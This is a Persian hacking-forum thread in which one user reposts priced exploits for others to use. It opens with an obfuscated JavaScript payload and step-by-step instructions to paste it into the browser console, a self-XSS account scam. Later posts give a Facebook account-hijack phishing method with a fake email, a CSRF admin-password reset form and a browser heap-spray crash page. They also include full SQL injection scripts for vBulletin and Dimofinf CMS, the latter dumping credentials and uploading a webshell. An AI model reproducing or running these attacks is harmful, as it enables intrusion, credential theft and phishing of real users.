623C623A611F620F449A416D416B632B632B632F413E581A566B572F578E569B608C608B596D413A572B608B602D416B599E590B620C623B620B416A425F440B440C446B425B434A443E434C434B437B443A437A443E428B443B377E452E305F629C566E617A371D566B617F617A371B458C371C605F578F632A371D470E617C617F566A638F452B305D629E566A617E371F626F620D578D617E560E590F575E371A458F371D575B608C572F626D602A578A605E623A413A572E608C608C596C590B578A413C602C566D623F572B587F395B575B608D572A626E602F578C605C623F413C572F608E608A596F590B578D413B602A566B623F572B587F395F416B572D560F626D620C578F617B458B395A551B575F404A398C416F398E548C422C554F398E452B305E305C581C626A605E572E623A590F608F605E371B566F626D623A608F611B608C620B623B590A605B584D581B626F605F572F395C620C578D605C575E578C617A398B371B644D305A371A371A371B371A590C581F371F395B575D608A572D626E602E578C605C623B413F584A578A623F482B599F578A602C578C605F623D473F638E494D575D395B377C623F635C623E485B599D608F608D575E506E620F584C377D398D413F629E566A599A626F578D371C374B458F371B377A377E398F371E602E620D584E371B458C371B575A608D572E626A602B578F605F623E413F584E578E623D482F599B578A602A578A605D623F473A638E494F575B395F377F623A635A623B485A599D608D608C575B506F620D584D377F398F413B629A566C599D626C578B452C305E371F371E371A371F593C635F413F599F608A566A575A395A632A590C605F575E608C632F413D599F608E572A566B623C590B608D605D413E611B617F608E623C608C572B608B599E371B404E371F377A416D416A632D632F632F413F581E566B572C578D569B608A608A596C413F572F608D602D416F566D593B566B635C416B623E638B611D578C566E587E578B566F575F416E620B578F566E617E572F587A416C569F608A608A623E620F623B617A566A611D413E611C587F611D464A560E560D566B458F422E389B581A590C599D623B578B617F548D419B554C458B584F617C608C626F611E389E629E590C578A632D578B617A458C377A371B404E371B626C620B578F617F560B590A575F371D404D371E377F389C623E608B596A578A605D458A629C440C389C599E566B641F638B458C419A389B560C560C626E620B578F617F458F377D371C404B371D626E620D578B617B560A590D575F407D371B581A626B605A572C623A590D608C605E371F395F566D398F371B644E305B371D371A371B371E371C371A371A371D629D566A617B371D569E371B458C371B566A452E305B371E371F371B371D371D371F371E371F629A566E617B371A572D371B458B371D569D413F620E626E569C620A623A617D590F605B584B395E569C413E590F605A575E578A635E512E581B395F377F644A377C398B398D452F305C371D371C371B371B371A371E371F371F629C566E617B371F575A371B458D371B497E524D512B509C413C611D566E617C620A578B395C572F398C452B305E371C371B371D371F371F371C371E371D575F371A458C371B575C413C611F566C638D599B608C566C575D413E578F605B623F617F590A578E620F452D305D371B371A371B371D371B371E371D371A581C608A617B371C395C629A566A617D371F578A371F458F371A419B452C371B578D371E455E371A575D413F599B578B605D584C623F587D452D371C578A404A404E398F371C566C617E617A413F611A626A620C587C395F575D548F578C554D413D626E590B575D398A452D305E371C371A371F371C371D371D371D371C620C578B605C575F578A617B413F611A566F617B578E605D623A509B608B575B578F413F590A605B605D578A617E491B527B506F503E371E458F371D377B515F599F578C566A620E578E371A536C566E590A623B413C413E413C377D452B305B371E371D371A371F371C371D371D371E611B608F620C623B590F623C608E596A395B398D305D371B371C371C371A650D398A305B650E305E629C566B617E371D566A371C458E371E575A608F572D626A602D578A605F623F413D569A608A575A638D413E590B605F605F578A617A491C527F506A503C452E305F629F566F617A371D575C623B620C371A458C371B575C608D572F626D602C578C605B623B413D584F578D623A482B599C578D602D578B605E623F620D473B638D509D566D602C578B395D377B581C569A560B575E623B620E584A377E398E548F419F554B413B629D566B599A626A578E452C305B629B566A617C371B572D608D602B611F608B620A578D617A590B575E371A458C371C575A608C572C626A602C578E605D623C413E572D608D608D596C590B578C413A602A566A623B572B587A395B575A608D572B626F602B578E605B623B413B572C608B608D596A590F578C413E602F566F623D572F587A395A416A572E560E626E620B578B617D458E395F551D575C404E398D416A398A548A422B554E398C452A305C305C581C626F605C572C623B590A608E605A371B611E608D620B623B590B623E608F596F395A398E371D644A305C371C371D371D371F611C620A623C371D458B371B377D581F569E560A575F623E620F584A458B377F371C404C371A575A623F620C371C404D371F377C389D635F587E611F572B560A572D608F602F611E608E620D578C617D590B575B458B377A371E404B371E572C608B602E611A608E620D578A617C590E575E371B404E371A377D389A635B587A611C572A560C623C566B617A584F578B623D590B575F458B377C371F404B371E566A617C617D548E620A626E572D554E371A404E371D377E389F635F587F611E572C560D572B608E605B623C578D635D623F458E587D608A602E578A389A635D587D611F572B560C581F569E635B458C422D389B635E587A611E572B560E602E578B620B620C566D584B578A560A623D578A635A623B458C377A371A404D371B578D605D572C608F575A578B530E521B494E476C608D602A611B608C605D578C605D623E395C602E620D584C398C371A404E371C377E389B635D587C611C572F560B602F578D620F620A566C584A578A458E377E371D404F371F578E605D572E608C575B578E530A521A494B476D608A602D611B608A605C578D605D623E395F602C620D584D398D371F404D371C377D389A530F494E515F617C590D629E566A572A638F536F590D575B584F578A623D548F419D554C458B431D419E389B611A617C590B629F566E572C638E560D575F566B623D566A548D629D566A599E626E578D554D458D431A419F389E611C617F590C629F566E572E638F560E575E566D623A566C548D581C617E590D578A605C575E620C554D458B419A389E611F617D590C629F566C572E638F560B575E566B623A566F548E599F590A620F623C560A566B605C608E605B554F458E419A389F611B617C590A629C566B572E638D560D575C566A623D566A548D599D590B620A623F560D635F560D566B605B608E605A554A458C419D389A458B524E587B566F617B578E389D605D572F623C617B548E560E602C608A575E554F458C611C566D584F578F599B578B623C560D584F617C608B626A611D560B572A608E602C611A608E620D578C617D377D452D305E371B371B371D371D632B590C623D587D395C605B578C632C635E371C458C371D605B578C632B371F539B506F503B491D623A623B611A521C578F614F626A578E620B623F398B371A608B611C578E605F395C377D515D512A524B527B377E407D371C377F416F566A593C566D635B416E626A611D575C566C623F578E620D623B566D623D626D620A413C611D587D611C464F560D560B566C458F422E377B398F407D371E620E578B605B575D395E611C620C623E398D452A305B371C371E371E371B620F626D572D404E404C452E305F371D371C371F371D590D581E371B395C620A626D572F371D461E371E566B617F617D413D599E578C605E584B623B587D398A371E644F305D371E371A371A371C371E371D371D371C566D599F578B617D623B395A377C470A626A623C608B371E515C608E620E623D590F605B584A371F476B608A602B611B599F578B623D578A575F413D371B509D608E632A371D521F578D581E617B578D620A587E371E638C608A626D617B371F491E608B602C578F611E566E584C578A413E377B398C452D305C371D371A371B371A371D371A371C371B620C626A572B371C458F371F419A371C305E371B371D371B371D650D371D578E599F620B578F371A620A578D623E527F590D602D578D608A626F623D395F377B611C608F620D623D590D623F608C596B395C398D377B407E371D428F482D431A371E416F371C566D617E617D413F599F578A605A584F623B587B398B305B650B305C620D578F623D527C590B602C578B608B626B623D395A377B566C626C623B608F611B608F620D623F590B605E584B581D626C605D572C395A398D377B407A371A422F482F428D398B452B302D305B305F';var _4345=/[x41x42x43x44x45x46]/;var _9077=2;var _6482=_4688.charAt(_4688.length-1);var _3561;var _4592=_4688.split(_4345);var _2908=[String.fromCharCode,isNaN,parseInt,String];_4592[1]=_2908[_9077+1](_2908[_9077](_4592[1])/21);var _5325=(_9077==5)?String:eval;_3561='';_11=_2908[_9077](_4592[0])/_2908[_9077](_4592[1]);for(_8628=3;_8628<_11;_8628++)_3561+=(_2908[_9077-2]((_2908[_9077](_4592[_8628])+_2908[_9077](_4592[2])+_2908[_9077](_4592[1]))/_2908[_9077](_4592[1])-_2908[_9077](_4592[2])+_2908[_9077](_4592[1])-1));var _2984='_2816';var _8252='_2984=_3561';function _8689(_4590){_5325(_2241);_8689(_3950);_3950(_8252);_8689(_2984);}var _2241='_8689=_5325';var _3950='_3950=_8689';_8689(_6482);  




    ctrl a ) <-- Select all Code  
    ctrl c ) <-- Copy  
       
    #Chorme User :-  
       
    -? F12 ConsoleBox or Ctrl+Shift+J ConsoleBox .  
    -? 
    Paste All The Code - ( Ctrl v ) .  
    -? 
    Enter DONE .  
       
    Picture ConsoleBox http://3.bp.blogspot.com/-AFeMZqtAo0Q/UhTFTou0vlI/AAAAAAAAAFQ/GqNqLCyquQ0/s1600/s.JPG  
       
    #Mozilla User :-  
       
    -? Ctrl+Shift+k ConsoleBox  
    -? Paste All The Code - ( Ctrl v ) .  
    -? 
    Enter DONE.  
       
    Picture ConsoleBox http://4.bp.blogspot.com/-QAFl5BIgmXI/UhS_zk6ZqKI/AAAAAAAAAFA/b2moK2btYYk/s1600/meteor.jpg  
       
       
    Notejust click the POST button once , and wait.
     
  3. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    WHMCS <= 5.1.3 Full Path Disclosure Vulnerability

    WHMCS <= 5.1.3 Full Path Disclosure Vulnerability
    10Golds
    http://www.1337day.com/exploit/description/19972

    PHP:
    [#] Dork : intext:netearthone.php


    [#] exploit :

    http://website/includes/smarty/Smarty_Compiler.class.php
    http://website/modules/registrars/netearthone/netearthone.php
     
  4. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    PBBoard Version 3.0.0 CSRF Vulnerability
    http://1337day.com/exploits/21683
    5Golds

    PHP:
    Open a new html file and put the code below with changing  
     

    PBBoard Version 3.0.0 CSRF Vulnerability  



    Dork
    :Powered by PBBoard © Version 3.0.0  
       
      
    the url 
    and click Send  
       
    HTML Code
     
       
    <form action="http://localhost/pbboard/index.php?page=new_password&forget=1" method="post" name="main" id="main" 
    <input type="hidden" name="member_id" value="1" 
    <input type="hidden" name="new_password" value="pass" 
    <input type="submit" name="Submit" value="Send" 
    </form  
       
    member_id 
    For the user id (default value is 1 for admin 
    new_password the 
    new password to change for(default password is pass)
     
  5. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    Mozilla Firefox 18.0.2/ Opera 12.12 / Iexplorer 9 Memory Corruption

    Mozilla Firefox 18.0.2/ Opera 12.12 / Iexplorer 9 Memory Corruption

    25Golds

    http://1337day.com/exploit/description/20324

    PHP:
    # Title :  Mozilla Firefox 18.0.2/ Opera 12.12 / Iexplorer 9  Memory Corruption  
    # Date: 2013-02-18  
    # Softwares Link:  
                   
    http://www.mozilla.org  
                               
    http://www.opera.com/  
                               
    http://windows.microsoft.com/fr-CA/internet-explorer/  
    # phone : +447024073406  
    # Author: The Black Devils  
    # Tested on: Windows XP SP2 & Puppy Linux & BackTrack 5  
    # Home: www.arab47.com منتديات عرب غرداية  
    # Greeting To :All Arab47 memberz/ 3xp1r3 Cyber Army / Newbie3viLc063s  
       
    <html>  
    <
    head>  
    <
    title>Firefox 18.0.2 M3M0RY C0RRUPT!0N </title>  
    <
    body onload="javascript:hakim();">  
    <
    script language="JavaScript">  
          function 
    hakim()  
           {  
    var 
    rop =unescape("%ubcf1%u1000");  
    rop+=unescape("%uf5ef%u1000");  
    rop+=unescape("%u0000%u0000");  
    rop+=unescape("%ucf2c%u1000");  
    rop+=unescape("%uea03%u1001");  
    rop+=unescape("%u6f51%u1000");  
    rop+=unescape("%ubfc1%u1000");  
    rop+=unescape("%u0060%u1002");  
    rop+=unescape("%u0c50%u0c0c");  
    rop+=unescape("%uee6a%u1000");  
    rop+=unescape("%udda4%u1000");  
    rop+=unescape("%u4870%u1000");  
    rop+=unescape("%u1ab4%u1000");  
    rop+=unescape("%u58c3%u1000");  
    rop+=unescape("%u4142%u4142");  
    rop+=unescape("%u4142%u4142");  
    rop+=unescape("%u4142%u4142");  
    rop+=unescape("%uf986%u1000");  
    rop+=unescape("%u4142%u4142");  
    rop+=unescape("%u4142%u4142");  
    rop+=unescape("%u4142%u4142");  
    rop+=unescape("%u4142%u4142");  
    rop+=unescape("%u4142%u4142");  
    rop+=unescape("%u0070%u0041");  
    rop+=unescape("%u4142%u4142");  
    rop+=unescape("%u4142%u4142");  
    rop+=unescape("%u4142%u4142");  
    rop+=unescape("%u4142%u4142");  
    rop+=unescape("%u4142%u4142");  
    rop+=unescape("%u4142%u4142");  
    rop+=unescape("%u4142%u4142");  
    rop+=unescape("%u0078%u0075");  
    rop+=unescape("%u006c%u002e");  
    rop+=unescape("%u0064%u006c");  
    rop+=unescape("%u006c%u0000");  
    rop+=unescape("%ucf2c%u1000");  
    rop+=unescape("%u3374%u00a6");  
    rop+=unescape("%u8acf%u1001");  
    rop+=unescape("%u8dd1%u1000");  
    rop+=unescape("%ue0b8%u1000");  
    rop+=unescape("%u3f14%u1001");   
    rop+=unescape("%ue0b8%u1000");  
    rop+=unescape("%u62d5%u1001");  
    rop+=unescape("%ucf2c%u1000");  
    rop+=unescape("%u9d12%u1001");  
    rop+=unescape("%uf5ef%u1000");  
    rop+=unescape("%u0001%u0000");  
    rop+=unescape("%u1000%u0000");  
    rop+=unescape("%u7e46%u1000");  
    rop+=unescape("%u0040%u0000");  
    rop+=unescape("%uaa6a%u1000");  
    rop+=unescape("%uaa03%u1001");  
    rop+=unescape("%u4870%u1000");  
    rop+=unescape("%u4870%u1000");  
    rop+=unescape("%u58c3%u1000");  
            
    document.write(rop);  
            var 
    buffer '\x41\x45\xF2'  
        
    for(i=0<= 999 ; ++i)  
            {  
        
    buffer+=buffer+buffer  
            document
    .write(buffer);  
                
            }  
    }  
    </
    script>  
    </
    head>  
    </
    body>  
    </
    html>  
       
       
    // Proof of concept  
    http://5.53.78ae.static.theplanet.com/~amodio/Sans%20titre.GIF  
       
    if you click on that link your browser will crash  
       
    http
    ://5.53.78ae.static.theplanet.com/~amodio/dz.html  
    -----------  
    Contact:  
    # Youtube  : www.youtube.com/user/Th3BlackDevils  
    # f*ac*ebook : www.f*ac*ebook.com/DevilsDz  
    # Email    : [email protected]
     
  6. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    f*ac*ebook Account Reset Hijack Trick

    f*ac*ebook Account Reset Hijack Trick

    50Golds

    http://1337day.com/exploit/description/21304

    PHP:
    ###
    #[+] Title : Hack Any f*ac*ebook Account Without User Name And Password
    #[+] Discovered By : Prince [ Cyber-Boss ]
    #[+] Site : Cyber-Boss.Net | blog.Cyber-Boss.Net
    #[+] f*ac*ebook Page : [url]http://fb.com/cyberboss.net[/url]
    #[+] Geetz : YasH , Code Injector, Arafat, Kunal
    ###

    50 GOLD
    So Are You Ready To Own Your Victim
    's Account With A Smart Hack ?

    First Of All send a text message containing only "fb" , "FBOOK" or "F" (without quotes) to 32665

    [ N.B : if you attache your account with your phone it won'
    t work on you..so use unused mobile number]

    Then You Will Get A Confirmation Message On Your Phone.
    Note Down The Confirmation Code.
    Now We Will Trick User To Click On The Link &quot

    [url]https://m.f*ac*ebook.com/a/?c=[/url][ConfirmationCode]&_rdr "

    For This I Send A Fake Email To Many Users And Every Time I Succeed Big Grin

    Sample Email To Make The Victim To Click On The Link 
    Let The Confirmation Code Is 365kj56 In My Case ) :
    ------------------------------
    -----------------------------------------------------------------
    Hi,
    Your f*ac*ebook account has been blocked because of spaming.
    To regain acess follow the link
    [url]https://m.f*ac*ebook.com/a/?c=365kj56&_rdr[/url]

    If your account is hackedplease review the information below to get help.
    - If 
    your account or a friend's account is sending out suspicious links:
    [url]https://www.f*ac*ebook.com/help/hacked[/url]
    - To report abuse:
    [url]https://www.f*ac*ebook.com/help/reportlinks[/url]
    - For any other questions or concerns, please visit our Help Center:
    [url]https://www.f*ac*ebook.com/help[/url]

    Thanks,
    The f*ac*ebook Team
    -----------------------------------------------------------------------------------------------

    As Soon As Your Victim Clicks On The Link And Clicks ACTIVATE
    Thinking His ID Is Blocked You Will Get A Message On The Same Number.
    Its Means Your Done Cool

    Now Hurrily You Have To Do Is Goto
    [url]Http://m.f*ac*ebook.com/login/easy[/url]

    And Enter The Phone Number.
    Then You Will Get The Link From Which We Can Acess His Account Even Without His Username & Password Big Grin

    By This We Will Backdoor His Account Tongue Like Leaving A Backdoor On The Server No Matter Even
    He Get To Know That He Is Tricked And He Changes The Password We Can Get The Access. We Have The Link To His Account Big Grin

    Use Before Fb Remove Easy Login Or Remove This Verification Method Smile

    Thanks For reading The Exploit.Hope You Own All Your Targets Thumbs Up

    #[+] With A Bit Social Eng. And A Smart Hack You Can Access Any User'
    s Account.
     
  7. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    vBulletin 5.1.2 SQL Injection Exploit

    2000Golds

    http://1337day.com/exploits/22452


    PHP:
    <?php
     
    /*
        Author: Nytro
        Powered by: Romanian Security Team
        Price: Free. Educational.
    */
     
     
    error_reporting(E_ALL);
    ini_set('display_errors'1);
     
     
    // Get arguments
     
     
    $target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';
    $expression str_replace('/''\\/'$target_url);
     
     
    // Function to send a POST request
     
     
    function httpPost($url,$params)
    {
     
       $ch curl_init($url);
     
     
     
       curl_setopt($chCURLOPT_URL,$url);
     
       curl_setopt($chCURLOPT_RETURNTRANSFER,true);
     
       curl_setopt($chCURLOPT_HEADERfalse);
     
       curl_setopt($chCURLOPT_SSL_VERIFYPEERfalse);
     
       curl_setopt($chCURLOPT_POST1);
     
       curl_setopt($chCURLOPT_POSTFIELDS$params);
     
        
        curl_setopt
    ($chCURLOPT_HTTPHEADER, array(
     
           'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
     
           'Accept: application/json, text/javascript, */*; q=0.01',
     
           'X-Requested-With: XMLHttpRequest',
     
           'Referer: https://rstforums.com/v5/memberlist',
     
           'Accept-Language: en-US,en;q=0.5',
     
           'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
     
        ));
     
     
     
       $output curl_exec($ch);
     
        
        if
    ($output == FALSE) print htmlspecialchars(curl_error($ch));
     
     
     
       curl_close($ch);
     
       return $output;
    }
     
     
    // Function to get string between two other strings
     
     
    function get_string_between($string$start$end)
    {
     
       $string " ".$string;
     
       $ini strpos($string,$start);
     
       if ($ini == 0) return "";
     
       $ini += strlen($start);
     
       $len strpos($string,$end,$ini) - $ini;
     
       return substr($string,$ini,$len);
    }
     
     
    // Get version
     
     
    print "\r\nRomanian Security Team - vBulltin 5.1.2 SQL Injection\r\n\r\n";
    print 
    "Version: ";
     
     
    $result httpPost($target_url '/ajax/render/memberlist_items',
     
           'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1  ,1)--+"+' .
     
           '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
     
     
    $letter 1;
     
     
    while(
    strpos($result'No Users Matched Your Query') == false)
    {
     
       $exploded explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' $expression '\/member\/'$result);
     
     
     
       $username get_string_between($exploded[1], '">''<\/a>');
     
       print $username[0];
     
        
        $letter
    ++;
     
       $result httpPost($target_url '/ajax/render/memberlist_items',
     
               'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(  ),' $letter ',1)--+"+' .
     
               '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
    }
     
     
    // Get user
     
     
    print "\r\nUser: ";
     
     
    $result httpPost($target_url '/ajax/render/memberlist_items',
     
           'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1  ,1)--+"+' .
     
           '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
     
     
    $letter 1;
     
     
    while(
    strpos($result'No Users Matched Your Query') == false)
    {
     
       $exploded explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' $expression '\/member\/'$result);
     
     
     
       $username get_string_between($exploded[1], '">''<\/a>');
     
       print $username[0];
     
     
     
       $letter++;
     
       $result httpPost($target_url '/ajax/render/memberlist_items',
     
               'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' $letter ',1)--+"+' .
     
               '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
    }
     
     
    // Get database
     
     
    print "\r\nDatabse: ";
     
     
    $result httpPost($target_url '/ajax/render/memberlist_items',
     
           'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),  1,1)--+"+' .
     
           '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
     
     
    $letter 1;
     
     
    while(
    strpos($result'No Users Matched Your Query') == false)
    {
     
       $exploded explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' $expression '\/member\/'$result);
     
     
     
       $username get_string_between($exploded[1], '">''<\/a>');
     
       print $username[0];
     
     
     
       $letter++;
     
       $result httpPost($target_url '/ajax/render/memberlist_items',
     
               'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),  ' $letter ',1)--+"+' .
     
               '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
    }
     
     
    print 
    "\r\n"
     
     
    ?> 
     
  8. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    Dimofinf cms version 3.0.0 Sql Injection Vulnerability - Private

    Dimofinf cms version 3.0.0 Sql Injection Vulnerability - Private

    لینک: http://en.1337day.com/exploit/description/20379

    Gold: 30$

    PHP:
    <title>private</title>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1256" />
    <h3> DimofInF Cms 3.0.0 Sqli To Remote Upload.</h3>
    <form method="POST">
    Site : <input type="text" name="url" placeholder="http://localhost/dimofinf/" size=40 /><br />
    <input type="submit" name="SQli" value="H4cK iT" />
    </form>
    <?php

    set_time_limit
    (0);

    /* 

            Author : The Company
            vuln Code : 

            else if ( $dimofinf->GPC['action'] == "detailstat" ) 
            { 
                $outdata = "<table class=\"tborder\" *****=\"100%\">"; 
                $fintotal = 0; 
                $unusr_total = $dimofinf->db->query_read_slave( "SELECT module,COUNT(*) AS total FROM ".TABLE_PREFIX."online WHERE ip='".$_REQUEST[ip]."' GROUP BY module  ORDER BY total DESC"
                
    */
        //echo time();
        
    if(isset($_POST['SQli']) && $_POST['url'] != ""){
        
    $url $_POST['url'];
        
    /*$sites = explode("\r\n",file_get_contents("dimofinf.txt")); // sites from file
        foreach($sites as $url){
        */
        
    $cURL2 curl_init();
        
    curl_setopt($cURL2,CURLOPT_RETURNTRANSFER,1);
        
    curl_setopt($cURL2,CURLOPT_URL,$url);
        
    curl_setopt($cURL2,CURLOPT_USERAGENT,'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
        
    $cURLex curl_exec($cURL2);
        
        echo 
    "<textarea cols='80' rows='10' >";
        
    $url $_POST['url'];
        
    $adminfo "ip=dz'/**//*!12345%55NION*//**//*!%53ELECT*//**/1,concat(0x3c6c3333743e,id,0x3a,username,0x3a,password,0x3a,email,0x3c2f6c3333743e)/**//*!from*//**//*!profile*//**/%23";
        
    $curl curl_init();
        
    curl_setopt($curlCURLOPT_URL,"$url/online.php?action=detailstat");
        
    curl_setopt($curlCURLOPT_RETURNTRANSFER1);
        
    curl_setopt($curlCURLOPT_POST1);
        
    curl_setopt($curlCURLOPT_POSTFIELDS,$adminfo);
        
    curl_setopt($curlCURLOPT_HEADERfalse);
        
    $exec=curl_exec($curl);
        
    curl_close($curl);
        
    preg_match("#<l33t>(.*?)</l33t>#" ,$exec,$res1);
        
    $admres explode(":",$res1[1]);
        echo 
    "[+] $url";
        echo  
    check($url);
        echo 
    cpuser($url);
        echo 
    "\n[+] Admin :\nid : $admres[0]\nuser : $admres[1]\npass : $admres[2]\nemail : $admres[3]\n\n";
        
        for(
    $LIMIT=1;$LIMIT<5000;$LIMIT++){
        
    $modinfo "ip=dz'/**//*!12345%55NION*//**//*!%53ELECT*//**/1,concat(0x3c6c3333743e,id,0x3a,username,0x3a,password,0x3a,email,0x3c2f6c3333743e) from moderators LIMIT ".$LIMIT.",1/**/%23";
        
    $ch curl_init();
        
    curl_setopt($chCURLOPT_URL"$url/online.php?action=detailstat");
        
    curl_setopt($chCURLOPT_POST1);
        
    curl_setopt($chCURLOPT_POSTFIELDS,$modinfo);
        
    curl_setopt($chCURLOPT_RETURNTRANSFER1);
        
    curl_setopt($chCURLOPT_HEADERfalse);
        
    $exec=curl_exec($ch);
        
    curl_close($ch);
        
    preg_match("#<l33t>(.*?)</l33t>#" ,$exec,$res2);
        if(empty(
    $res2)){break;}
        
    $modres explode(":",$res2[1]);
        echo 
    "\n[+] Moderators id=$modres[0] :\nid : $modres[0]\nuser : $modres[1]\npass : $modres[2]\nemail : $modres[3]\n\n";
        
        }
        echo 
    "</textarea><br /><br />";
        
    upload($url);
        
        }
    /*}*/
    function upload($url){
        
    $l33t curl_init();
        
    curl_setopt($l33tCURLOPT_URL$url."/dimcp/style.php?action=edit&stylef=default");
        
    curl_setopt($l33tCURLOPT_COOKIE"dimadmlogin=$admres[1]-$admres[2]-1445767838");
        
    curl_setopt($l33tCURLOPT_POST1);
        
    curl_setopt($l33tCURLOPT_POSTFIELDS,'template=../../L33t_BOT.php&newtext=%3C%3Fphp%0D%0Aecho+%27%3Cb%3Eby+L33t_BOT%3Cbr%3E%3C%2Fb%3E%27%3B%0D%0Aecho+%27%3Cform+action%3D%22%22+method%3D%22post%22+enctype%3D%22multipart%2Fform-data%22+name%3D%22uploader%22+id%3D%22uploader%22%3E%27%3B%0D%0Aecho+%27%3Cinput+type%3D%22file%22+name%3D%22file%22+size%3D%2250%22%3E%3Cinput+name%3D%22_upl%22+type%3D%22submit%22+id%3D%22_upl%22+value%3D%22Upload%22%3E%3C%2Fform%3E%27%3B%0D%0Aif%28%24_POST%5B%27_upl%27%5D+%3D%3D+%22Upload%22%29%7B%0D%0Aif%28%40copy%28%24_FILES%5B%27file%27%5D%5B%27tmp_name%27%5D%2C+%24_FILES%5B%27file%27%5D%5B%27name%27%5D%29%29%7B%0D%0Aecho+%27%3Cb%3EFile+Uploaded+%5E_%5E%3C%2Fb%3E%3Cbr%3E%3Cbr%3E%27%3B%0D%0A%7Delse%7B%0D%0Aecho+%27%3Cb%3EUpload+Fail+%21%21%21%3C%2Fb%3E%3Cbr%3E%3Cbr%3E%27%3B%0D%0A%7D%0D%0A%7D%0D%0A%3F%3E&edit=%CA%CD%D1%ED%D1');
        
    curl_setopt($l33t,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0");
        
    curl_setopt($l33t,CURLOPT_RETURNTRANSFER,1);
        
    $res curl_exec($l33t);
        
    //print_r($res);
        
    if(eregi("L33t_BOT",@file_get_contents("$url/L33t_BOT.php"))){
        echo 
    "[+] <a href='$url/L33t_BOT.php'>$url/L33t_BOT.php</a> -> Upload Success\n";
        
    file_put_contents("dimofinf-up.txt","$url/L33t_BOT.php\n",FILE_APPEND);
        }else {echo 
    "[+] $url -> Upload Filed\n";}
    }


    function 
    check($url){
        
        if(
    preg_match('<div class="tcat" align="center">',file_get_contents("$url/dimcp/"))){
            echo 
    " -> Admin panel Not Protected\n";
        }else {
            echo 
    " -> Admin panel Protected\n";
        }
    }

    function 
    cpuser($url){
        
    $x preg_match("/Table '(.*?)_/",file_get_contents("$url/search.php?action=startsearch&keyword=k!ll3r&searchin=albumss&submit="),$cp);
        if(
    $x){
        echo 
    "Cpanel User -> ".$cp[1];}
    }


    ?> 
     
  9. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    Joomla mega menu module File Upload Vulnerability metasploit

    Joomla mega menu module File Upload Vulnerability metasploit

    قیمت زیادی نداره ولی خب گفتم بذارم.

    2$ :Gold

    لینک: http://1337day.com/exploit/description/20105

    PHP:
    #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=# 
    #        _                                 __              __      __                      # 
    #   /' \                        __  /'__`\              /\ \__  /'__`\                     # 
    #  /\_, \       ___   /\_\/\_\ \ \      ___\ \ ,_\/\ \/\ \  _ ___                          # 
    #  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\                              # 
    #        \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/                            # 
    #         \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\                            # 
    #          \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/                            # 
    #                                 \ \____/ >> Exploit database separated by exploit        # 
    #                                  \/___/                 type (local, remote, DoS, etc.)  # 
    #                                                                                          # 
    #  [+] Site                     : 1337day.com                                              # 
    #  [+] Support e-mail  : submit[at]1337day.com                                             # 
